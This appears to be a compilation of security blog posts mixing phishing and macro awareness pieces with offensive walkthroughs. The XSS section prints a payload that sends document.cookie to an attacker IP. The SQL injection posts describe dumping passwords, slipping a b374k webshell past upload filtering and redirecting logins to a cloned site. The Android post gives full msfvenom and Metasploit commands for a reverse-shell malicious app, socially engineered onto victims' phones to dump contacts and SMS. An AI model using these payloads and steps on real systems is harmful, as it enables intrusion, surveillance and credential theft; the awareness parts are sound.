DDEAUTO Opens Webpage

We have already posted about DDEAUTO, but thought we’d show another one just as it’s slightly different.

If a document opens and you are greeted by a pop up of any kind, then I’d say 99 times out of a hundred, it’s going to be a malicious exploit and you should just close and delete the document immediately and run a full Anti-Virus scan with at least 3 different free scanners.

Then 2 weeks later re-run all the scans again.

The DDEAUTO Exploit in all Microsoft Office Documents

This is the new exploit which is everywhere at the moment.

It’s a little different to the typical Macro exploits which are normally used.

In general you will need to click on 2 pop ups to allow the exploit to run, however since writing this I have played around a bit more and managed to get it down to only one pop up.

The point here in this video however is to show that if you read what the pop up says, you should not be clicking on it in any circumstances.

It’s true that some documents are linked dynamically to keep all data in linked sheets up to date. However if you are using one of these you would normally know about it.

If you don’t normally use documents with linked data and you open one which asks you to allow linked data, don’t just click OK! If you know who sent it, ask them what it is, and if you don’t know where it came from you probably should even be opening the attachment in the first place!

Then after clicking yes to the first pop up, we receive a second one, this is generally where the exploit will run. Ours is very obviously named for the sake of this demonstration, but an attacker would be trying their best to disguise it.

We hope that by watching this video you will be a little bit more educated and perhaps won’t click on that pop up box if you receive one of these emails!

Enjoy the Video.

Excel Malicious Macro Attachment

Hello again.

It’s 2017 and we are still enabling Macros in documents we receive via email! (Come on people!)

Anyways, there are still people out there who don’t believe a macro can be used this way, so here is a quick video you can show them.

In this short clip a user receives an email from Jerry.random@uk-company.com, but you can clearly see it actually came from a gmail address, and it contains an Excel invoice attachment.

In this example we have Excel set to not allow Macros to run automatically, but we are aware that a lot of people don’t use this setting (you nut-cases!).

Notice that nothing happens until the Macro is enabled!

Don’t enable a macro unless you are 100% sure of what it is.

The Excel sheet contains a simple macro which opens IE and goes to a website. This demonstrates how easy it is for an attacker to use a macro to either install malware or ransomware.  We have used this method in our demo as it is very quick and visual and seems to get the point across better than a more complicated example.

Fake URL in Email

IT’s 2017 and we are still clicking on links in emails!

This is a quick video to demonstrate how a link in an email displaying one address can take you somewhere completely different!

We’re going to follow this up with some videos showing malicious attachments.

Don’t trust emails!

XSS Cookie Steal

Here we demonstrate why you should be filtering any user input.

This shows how easy it is for an attacker to plant some malicious code on a site and steal the admin login credentials (Or another user), by using Cross-Site-Scripting. There is a great explanation on OWASP’s website.

First we test the text areas for correct input validation and when we find it is not being correctly checked we then look to exploit that flaw.

By enclosing the following in script tags “document.write(‘<img src=”http://192.168.56.104/?’+document.cookie+’ “/>’);” we can send the stolen cookies to our PC and then reuse them on the site to gain access to the admin panel and from there we can add  malicious code, create new users or look to get root access on the server.

The site is on 192.168.56.103 and our attacking machine is on 192.168.56.104.

To demostrate this we are using the “XSS and MySQL File” VM from Pentesterlab.com

SQL Injection to URL Redirect Part 2

In this video we start off by using “wget” to clone the site we are attacking so when users are redirected to our site they are less suspicious as any differences are subtle, and wont generally be noticed by normal users. Then we load the cloned pages on our webserver.

For the purpose of the demo we have left the IP address showing in the address bar so you can see the difference. The original site is on .105 and our clone is on .104 (Poisoning the host file or typo-squatting is a whole tutorial by itself).

Back to the hack. We have enough access that if we wanted to we could upload our own pages and replace the existing ones, but for the purpose of this we are going to change where the login URL points to so it sends users to our clone site rather then the correct login page.

We could obviously do this with every link on the site. We could also just upload some further malicious code to the server so that every visitor to the site will have their browser injected with malicious code.

SQL Injection to URL Redirect Part 1

Today we are going to show how an attacker can leverage SQL Injection to redirect users to their own site/webpage for whatever malicious activity they choose.

This will be in two parts. The first will show how using a tool called sqlmap we can carry out successful SLQ Injection, and very quickly dump usernames and passwords. The “php?id=1” part of the URL is injectable, and this is what sqlmap will exploit.

Then once we have access to the admin section, we upload our php shell, but the site has some basic filtering so we change the filename and extension from “b374k-2.8.php” to “b374k-2.8 (copy).jpg.phtml” which gets us past the filtering controls. It also shows why even in password protected areas of your site you still need rubust upload controls. It means if someone manages to access the area they will still have to work to be able to upload a shell. Always think security in depth. Always add layers.

This video ends with us logging into the uploaded webshell and accessing the www directory.

How To Create a Malicious App for Android

So, recently got interested in how secure Android apps are and how I could learn a bit more about them. The best way to learn? Create my own malicious App!

What else would we use other than Metasploit?

So we fire up the console like so…

service postgresql start

msfconsole

First we need to create the malicious .apk file, so open another Terminal Window and use the following making sure you enter your IP and port number after the “=” symbols.

msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xxxx -o malicious.apk

You can name the app whatever you like using the “-o” switch. There are also other options you can specify but we will keep it simple for now.

In the first Window running Metasploit we now start a handler which will “listen” for when our app is installed and used which launches the connection attempt. We do this like so.

use exploit/multi/handler

Then we need to set IP, Port and Payload.  The port and IP need to be the same set in the previous steps when using msfvenom

set LHOST xx.xx.xx.xx

set LPORT xxxx

set PAYLOAD android/meterpreter/reverse_tcp

We can check what is required for an exploit at any time once it is loaded by running

show options

We have everything we need now configured so we can start the “listener”

run

Then we use social engineering to try and get someone to install and run it.

When they do you will the connection come back from the phone.

In this example we got 2 connections! We can list them with this command

sessions -i

We can then connect by using the same command but choosing which session we want to connect to.

sessions 1

And then quickly get some info to confirm the device.

sysinfo

Then we can quickly dump info from the phone imediately using the dump commands

dump_contacts

dump_sms

You can also capture a screen shot, take a photo front either camera, or even stream live from either camera on the device. Scary huh?

If you have NO anti Virus on your Android, and you have disabled the “verify app” feature then this simple app will run without any issues.

If you have an Android phone, enable the app verifier, and get some anti virus to at least give yourself a fighting chance!

There will be a follow up to this post as there are tools we can use to make our malicious apps look better and be less likely to be blocked by anti virus. That’s it for now though.

Android App Vulnerability Scanning

Recently I had the need to assess some Android Apps and had to hunt quite a bit for something decent but I found it Here. The AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications, and it’s QUICK!

I use Linux so to get up and running is as simple as downloading from the above link, unzipping to somewhere convenient, making sure you have python installed and for basic usage that’s it!

I have an Android app named “app.apk” and a Reports folder in the Framework-master folder.

So from within the Androbugs-framework folder we simply run

python androbugs.py -f ~/Downloads/app.apk -o Reports

Thats it! We get a really good report listing bugs, CVE’s, and TLS issues to name a few.

There is a “Massive Analysis Tool” for linux which requires a bit more setup which looks really good. It require’s the setup of a MongoDB so once I’ve got that up and running I’ll post on it.

Eternal Blue Scan and Exploit Demo

It’s everywhere at the moment. ms17_010 or Eternal Blue as it’s affectionately known. It’s another great example of why it’s so important to not only keep your Anti Virus solution up to date, but also to install the latest patches for your OS.  This exploit requires just 2 things. That the port is open and that the required patch is not installed. In this demonstration we are attacking Windows Server 2008, setup using the Metasploitable 3 script from this project https://github.com/rapid7/metasploitable3

You can see that both the scanner and the exploit are built right into Metasploit and they are very easy to use. Patch your machines, Even if you think you can’t set up a test environment and try. Make good backups, and check that they work. Enjoy the video.

If you wanna setup Metasploitable 3 you need to do a bit of legwork, it doesn’t just work out of the box like it’s predecessor, and you need to install some prerequisites. The guides I used are here http://www.prodefence.org/2017/06/setup-metasploitable-3-windows-10/ and here  https://www.youtube.com/watch?v=i_K2cZcTXeI&t=580s